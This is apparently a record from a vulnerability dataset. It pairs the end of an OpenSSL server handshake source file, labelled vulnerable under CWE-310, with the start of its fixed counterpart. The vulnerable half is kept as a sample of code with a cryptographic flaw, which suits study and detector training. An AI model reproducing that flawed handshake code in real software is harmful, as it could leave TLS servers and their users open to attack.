SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
start = p;
inlen = Tlen;
if (EVP_PKEY_decrypt(pkey_ctx,premaster_secret,&outlen,start,inlen) <=0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
/* Generate master secret */
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,premaster_secret,32);
/* Check if pubkey from client certificate was used */
if (EVP_PKEY_CTX_ctrl(pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
ret = 2;
else
ret = 1;
gerr:
EVP_PKEY_free(client_pub_pkey);
EVP_PKEY_CTX_free(pkey_ctx);
if (ret)
return ret;
else
goto err;
}
else
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNKNOWN_CIPHER_TYPE);
goto f_err;
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
#if !defined(OPENSSL_NO_DH) || !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_ECDH) || defined(OPENSSL_NO_SRP)
err:
#endif
#ifndef OPENSSL_NO_ECDH
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
if (srvr_ecdh != NULL)
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
#endif
return(-1);
}
int ssl3_get_cert_verify(SSL *s)
{
EVP_PKEY *pkey=NULL;
unsigned char *p;
int al,ok,ret=0;
long n;
int type=0,i,j;
X509 *peer;
const EVP_MD *md = NULL;
EVP_MD_CTX mctx;
EVP_MD_CTX_init(&mctx);
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_VRFY_A,
SSL3_ST_SR_CERT_VRFY_B,
-1,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
if (s->session->peer != NULL)
{
peer=s->session->peer;
pkey=X509_get_pubkey(peer);
type=X509_certificate_type(peer,pkey);
}
else
{
peer=NULL;
pkey=NULL;
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY)
{
s->s3->tmp.reuse_message=1;
if ((peer != NULL) && (type & EVP_PKT_SIGN))
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_MISSING_VERIFY_MESSAGE);
goto f_err;
}
ret=1;
goto end;
}
if (peer == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_NO_CLIENT_CERT_RECEIVED);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
if (!(type & EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
al=SSL_AD_ILLEGAL_PARAMETER;
goto f_err;
}
if (s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_CCS_RECEIVED_EARLY);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
/* we now have a signature that we need to verify */
p=(unsigned char *)s->init_msg;
/* Check for broken implementations of GOST ciphersuites */
/* If key is GOST and n is exactly 64, it is bare
* signature without length field */
if (n==64 && (pkey->type==NID_id_GostR3410_94 ||
pkey->type == NID_id_GostR3410_2001) )
{
i=64;
}
else
{
if (SSL_USE_SIGALGS(s))
{
int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
{
al = SSL_AD_INTERNAL_ERROR;
goto f_err;
}
else if (rv == 0)
{
al = SSL_AD_DECODE_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
n2s(p,i);
n-=2;
if (i > n)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_LENGTH_MISMATCH);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
}
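/* Sanity-check the lengths: the signature can never be larger than
 * EVP_PKEY_size(pkey), and the remaining message length must be positive
 * and within that same bound. */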
j=EVP_PKEY_size(pkey);
if ((i > j) || (n > j) || (n <= 0))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_WRONG_SIGNATURE_SIZE);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
if (hdatalen <= 0)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_VerifyInit_ex(&mctx, md, NULL)
|| !EVP_VerifyUpdate(&mctx, hdata, hdatalen))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
if (EVP_VerifyFinal(&mctx, p , i, pkey) <= 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
i=RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH, p, i,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
j=DSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.dsa);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_DSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
j=ECDSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.ec);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{ unsigned char signature[64];
int idx;
EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_verify_init(pctx);
if (i!=64) {
fprintf(stderr,"GOST signature length is %d\n",i);
}
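/* The signature bytes are reversed here: the wire encoding uses the
 * opposite byte order from what EVP_PKEY_verify expects for GOST keys. */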
for (idx=0;idx<64;idx++) {
signature[63-idx]=p[idx];
}
j=EVP_PKEY_verify(pctx,signature,64,s->s3->tmp.cert_verify_md,32);
EVP_PKEY_CTX_free(pctx);
if (j<=0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,ERR_R_INTERNAL_ERROR);
al=SSL_AD_UNSUPPORTED_CERTIFICATE;
goto f_err;
}
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
end:
if (s->s3->handshake_buffer)
{
BIO_free(s->s3->handshake_buffer);
s->s3->handshake_buffer = NULL;
s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_free(pkey);
return(ret);
}
int ssl3_get_client_certificate(SSL *s)
{
int i,ok,al,ret= -1;
X509 *x=NULL;
unsigned long l,nc,llen,n;
const unsigned char *p,*q;
unsigned char *d;
STACK_OF(X509) *sk=NULL;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_A,
SSL3_ST_SR_CERT_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if (s->s3->tmp.message_type == SSL3_MT_CLIENT_KEY_EXCHANGE)
{
if ( (s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* If TLS asked for a client cert, the client must return a 0-length list */
if ((s->version > SSL3_VERSION) && s->s3->tmp.cert_request)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
s->s3->tmp.reuse_message=1;
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_WRONG_MESSAGE_TYPE);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
if ((sk=sk_X509_new_null()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
n2l3(p,llen);
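/* llen is the 3-byte length of the entire certificate list; each entry
 * that follows is a 3-byte length plus one DER-encoded certificate. */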
if (llen+3 != n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
for (nc=0; nc<llen; )
{
n2l3(p,l);
if ((l+nc+3) > llen)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
q=p;
x=d2i_X509(NULL,&p,l);
if (x == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_ASN1_LIB);
goto err;
}
if (p != (q+l))
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
if (!sk_X509_push(sk,x))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
x=NULL;
nc+=l+3;
}
if (sk_X509_num(sk) <= 0)
{
/* TLS does not mind 0 certs returned */
if (s->version == SSL3_VERSION)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_NO_CERTIFICATES_RETURNED);
goto f_err;
}
/* Fail for TLS only if we required a certificate */
else if ((s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* No client certificate so digest cached records */
if (s->s3->handshake_buffer && !ssl3_digest_cached_records(s))
{
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
}
else
{
EVP_PKEY *pkey;
i=ssl_verify_cert_chain(s,sk);
if (i <= 0)
{
al=ssl_verify_alarm_type(s->verify_result);
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERTIFICATE_VERIFY_FAILED);
goto f_err;
}
if (i > 1)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, i);
al = SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
pkey = X509_get_pubkey(sk_X509_value(sk, 0));
if (pkey == NULL)
{
al=SSL3_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
SSL_R_UNKNOWN_CERTIFICATE_TYPE);
goto f_err;
}
EVP_PKEY_free(pkey);
}
if (s->session->peer != NULL) /* This should not be needed */
X509_free(s->session->peer);
s->session->peer=sk_X509_shift(sk);
s->session->verify_result = s->verify_result;
/* With the current implementation, sess_cert will always be NULL
* when we arrive here. */
if (s->session->sess_cert == NULL)
{
s->session->sess_cert = ssl_sess_cert_new();
if (s->session->sess_cert == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
goto err;
}
}
if (s->session->sess_cert->cert_chain != NULL)
sk_X509_pop_free(s->session->sess_cert->cert_chain, X509_free);
s->session->sess_cert->cert_chain=sk;
/* Inconsistency alert: cert_chain does *not* include the
* peer's own certificate, while we do include it in s3_clnt.c */
sk=NULL;
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (x != NULL) X509_free(x);
if (sk != NULL) sk_X509_pop_free(sk,X509_free);
return(ret);
}
int ssl3_send_server_certificate(SSL *s)
{
CERT_PKEY *cpk;
if (s->state == SSL3_ST_SW_CERT_A)
{
cpk=ssl_get_server_send_pkey(s);
if (cpk == NULL)
{
/* VRS: allow null cert if auth == KRB5 */
if ((s->s3->tmp.new_cipher->algorithm_auth != SSL_aKRB5) ||
(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
}
if (!ssl3_output_cert_chain(s,cpk))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
s->state=SSL3_ST_SW_CERT_B;
}
/* SSL3_ST_SW_CERT_B */
return ssl_do_write(s);
}
#ifndef OPENSSL_NO_TLSEXT
/* send a new session ticket (not necessarily for a new session) */
int ssl3_send_newsession_ticket(SSL *s)
{
if (s->state == SSL3_ST_SW_SESSION_TICKET_A)
{
unsigned char *p, *senc, *macstart;
const unsigned char *const_p;
int len, slen_full, slen;
SSL_SESSION *sess;
unsigned int hlen;
EVP_CIPHER_CTX ctx;
HMAC_CTX hctx;
SSL_CTX *tctx = s->initial_ctx;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char key_name[16];
/* get session encoding length */
slen_full = i2d_SSL_SESSION(s->session, NULL);
/* Some length values are 16 bits, so forget it if session is
* too long
*/
if (slen_full > 0xFF00)
return -1;
senc = OPENSSL_malloc(slen_full);
if (!senc)
return -1;
p = senc;
i2d_SSL_SESSION(s->session, &p);
/* create a fresh copy (not shared with other threads) to clean up */
const_p = senc;
sess = d2i_SSL_SESSION(NULL, &const_p, slen_full);
if (sess == NULL)
{
OPENSSL_free(senc);
return -1;
}
sess->session_id_length = 0; /* ID is irrelevant for the ticket */
slen = i2d_SSL_SESSION(sess, NULL);
if (slen > slen_full) /* shouldn't ever happen */
{
OPENSSL_free(senc);
return -1;
}
p = senc;
i2d_SSL_SESSION(sess, &p);
SSL_SESSION_free(sess);
/*-
* Grow buffer if need be: the length calculation is as
* follows handshake_header_length +
* 4 (ticket lifetime hint) + 2 (ticket length) +
* 16 (key name) + max_iv_len (iv length) +
* session_length + max_enc_block_size (max encrypted session
* length) + max_md_size (HMAC).
*/
if (!BUF_MEM_grow(s->init_buf,
SSL_HM_HEADER_LENGTH(s) + 22 + EVP_MAX_IV_LENGTH +
EVP_MAX_BLOCK_LENGTH + EVP_MAX_MD_SIZE + slen))
return -1;
p = ssl_handshake_start(s);
EVP_CIPHER_CTX_init(&ctx);
HMAC_CTX_init(&hctx);
/* Initialize HMAC and cipher contexts. If a callback is present
* it does all the work, otherwise use generated values
* from the parent ctx.
*/
if (tctx->tlsext_ticket_key_cb)
{
if (tctx->tlsext_ticket_key_cb(s, key_name, iv, &ctx,
&hctx, 1) < 0)
{
OPENSSL_free(senc);
return -1;
}
}
else
{
RAND_pseudo_bytes(iv, 16);
EVP_EncryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL,
tctx->tlsext_tick_aes_key, iv);
HMAC_Init_ex(&hctx, tctx->tlsext_tick_hmac_key, 16,
tlsext_tick_md(), NULL);
memcpy(key_name, tctx->tlsext_tick_key_name, 16);
}
/* Ticket lifetime hint (advisory only):
* We leave this unspecified for resumed sessions (for simplicity),
* and guess that tickets for new sessions will live as long
* as their sessions. */
l2n(s->hit ? 0 : s->session->timeout, p);
/* Skip ticket length for now */
p += 2;
/* Output key name */
macstart = p;
memcpy(p, key_name, 16);
p += 16;
/* output IV */
memcpy(p, iv, EVP_CIPHER_CTX_iv_length(&ctx));
p += EVP_CIPHER_CTX_iv_length(&ctx);
/* Encrypt session data */
EVP_EncryptUpdate(&ctx, p, &len, senc, slen);
p += len;
EVP_EncryptFinal(&ctx, p, &len);
p += len;
EVP_CIPHER_CTX_cleanup(&ctx);
HMAC_Update(&hctx, macstart, p - macstart);
HMAC_Final(&hctx, p, &hlen);
HMAC_CTX_cleanup(&hctx);
p += hlen;
/* Now write out lengths: p points to end of data written */
/* Total length */
len = p - ssl_handshake_start(s);
ssl_set_handshake_header(s, SSL3_MT_NEWSESSION_TICKET, len);
/* Skip ticket lifetime hint */
p = ssl_handshake_start(s) + 4;
s2n(len - 6, p);
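/* len - 6 strips the 4-byte lifetime hint and the 2-byte ticket length
 * field itself, so the value written here is the length of the ticket body. */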
s->state=SSL3_ST_SW_SESSION_TICKET_B;
OPENSSL_free(senc);
}
/* SSL3_ST_SW_SESSION_TICKET_B */
return ssl_do_write(s);
}
int ssl3_send_cert_status(SSL *s)
{
if (s->state == SSL3_ST_SW_CERT_STATUS_A)
{
unsigned char *p;
/*-
* Grow buffer if need be: the length calculation is as
* follows 1 (message type) + 3 (message length) +
* 1 (ocsp response type) + 3 (ocsp response length)
* + (ocsp response)
*/
if (!BUF_MEM_grow(s->init_buf, 8 + s->tlsext_ocsp_resplen))
return -1;
p=(unsigned char *)s->init_buf->data;
/* do the header */
*(p++)=SSL3_MT_CERTIFICATE_STATUS;
/* message length */
l2n3(s->tlsext_ocsp_resplen + 4, p);
/* status type */
*(p++)= s->tlsext_status_type;
/* length of OCSP response */
l2n3(s->tlsext_ocsp_resplen, p);
/* actual response */
memcpy(p, s->tlsext_ocsp_resp, s->tlsext_ocsp_resplen);
/* number of bytes to write */
s->init_num = 8 + s->tlsext_ocsp_resplen;
s->state=SSL3_ST_SW_CERT_STATUS_B;
s->init_off = 0;
}
/* SSL3_ST_SW_CERT_STATUS_B */
return(ssl3_do_write(s,SSL3_RT_HANDSHAKE));
}
# ifndef OPENSSL_NO_NEXTPROTONEG
/* ssl3_get_next_proto reads a Next Protocol Negotiation handshake message. It
* sets s->next_proto_negotiated if the message is valid */
int ssl3_get_next_proto(SSL *s)
{
int ok;
int proto_len, padding_len;
long n;
const unsigned char *p;
/* Clients cannot send a NextProtocol message if we didn't see the
* extension in their ClientHello */
if (!s->s3->next_proto_neg_seen)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION);
return -1;
}
n=s->method->ssl_get_message(s,
SSL3_ST_SR_NEXT_PROTO_A,
SSL3_ST_SR_NEXT_PROTO_B,
SSL3_MT_NEXT_PROTO,
514, /* See the payload format below */
&ok);
if (!ok)
return((int)n);
/* s->state doesn't reflect whether ChangeCipherSpec has been received
* in this handshake, but s->s3->change_cipher_spec does (will be reset
* by ssl3_get_finished). */
if (!s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS);
return -1;
}
if (n < 2)
return 0; /* The body must be at least 2 bytes long */
p=(unsigned char *)s->init_msg;
/*-
* The payload looks like:
* uint8 proto_len;
* uint8 proto[proto_len];
* uint8 padding_len;
* uint8 padding[padding_len];
*/
proto_len = p[0];
if (proto_len + 2 > s->init_num)
return 0;
padding_len = p[proto_len + 1];
if (proto_len + padding_len + 2 != s->init_num)
return 0;
s->next_proto_negotiated = OPENSSL_malloc(proto_len);
if (!s->next_proto_negotiated)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,ERR_R_MALLOC_FAILURE);
return 0;
}
memcpy(s->next_proto_negotiated, p + 1, proto_len);
s->next_proto_negotiated_len = proto_len;
return 1;
}
# endif
#endif
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_1445_5 |
crossvul-cpp_data_good_1445_5 | /* ssl/s3_srvr.c -*- mode:C; c-file-style: "eay" -*- */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* ====================================================================
* Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
/* ====================================================================
* Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
*
* Portions of the attached software ("Contribution") are developed by
* SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
*
* The Contribution is licensed pursuant to the OpenSSL open source
* license provided above.
*
* ECC cipher suite support in OpenSSL originally written by
* Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
*
*/
/* ====================================================================
* Copyright 2005 Nokia. All rights reserved.
*
* The portions of the attached software ("Contribution") is developed by
* Nokia Corporation and is licensed pursuant to the OpenSSL open source
* license.
*
* The Contribution, originally written by Mika Kousa and Pasi Eronen of
* Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
* support (see RFC 4279) to OpenSSL.
*
* No patent licenses or other rights except those expressly stated in
* the OpenSSL open source license shall be deemed granted or received
* expressly, by implication, estoppel, or otherwise.
*
* No assurances are provided by Nokia that the Contribution does not
* infringe the patent or other intellectual property rights of any third
* party or that the license provides you with all the necessary rights
* to make use of the Contribution.
*
* THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
* ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
* SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
* OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
* OTHERWISE.
*/
#define REUSE_CIPHER_BUG
#define NETSCAPE_HANG_BUG
#include <stdio.h>
#include "ssl_locl.h"
#include "kssl_lcl.h"
#include "../crypto/constant_time_locl.h"
#include <openssl/buffer.h>
#include <openssl/rand.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/x509.h>
#ifndef OPENSSL_NO_DH
#include <openssl/dh.h>
#endif
#include <openssl/bn.h>
#ifndef OPENSSL_NO_KRB5
#include <openssl/krb5_asn.h>
#endif
#include <openssl/md5.h>
#ifndef OPENSSL_NO_SSL3_METHOD
static const SSL_METHOD *ssl3_get_server_method(int ver);
static const SSL_METHOD *ssl3_get_server_method(int ver)
{
if (ver == SSL3_VERSION)
return(SSLv3_server_method());
else
return(NULL);
}
IMPLEMENT_ssl3_meth_func(SSLv3_server_method,
ssl3_accept,
ssl_undefined_function,
ssl3_get_server_method)
#endif
#ifndef OPENSSL_NO_SRP
static int ssl_check_srp_ext_ClientHello(SSL *s, int *al)
{
int ret = SSL_ERROR_NONE;
*al = SSL_AD_UNRECOGNIZED_NAME;
if ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) &&
(s->srp_ctx.TLS_ext_srp_username_callback != NULL))
{
if(s->srp_ctx.login == NULL)
{
/* RFC 5054 says we SHOULD reject;
we do so if there is no SRP login name */
ret = SSL3_AL_FATAL;
*al = SSL_AD_UNKNOWN_PSK_IDENTITY;
}
else
{
ret = SSL_srp_server_param_with_username(s,al);
}
}
return ret;
}
#endif
int ssl3_accept(SSL *s)
{
BUF_MEM *buf;
unsigned long alg_k,Time=(unsigned long)time(NULL);
void (*cb)(const SSL *ssl,int type,int val)=NULL;
int ret= -1;
int new_state,state,skip=0;
RAND_add(&Time,sizeof(Time),0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb=s->info_callback;
else if (s->ctx->info_callback != NULL)
cb=s->ctx->info_callback;
/* init things to blank */
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s)) SSL_clear(s);
if (s->cert == NULL)
{
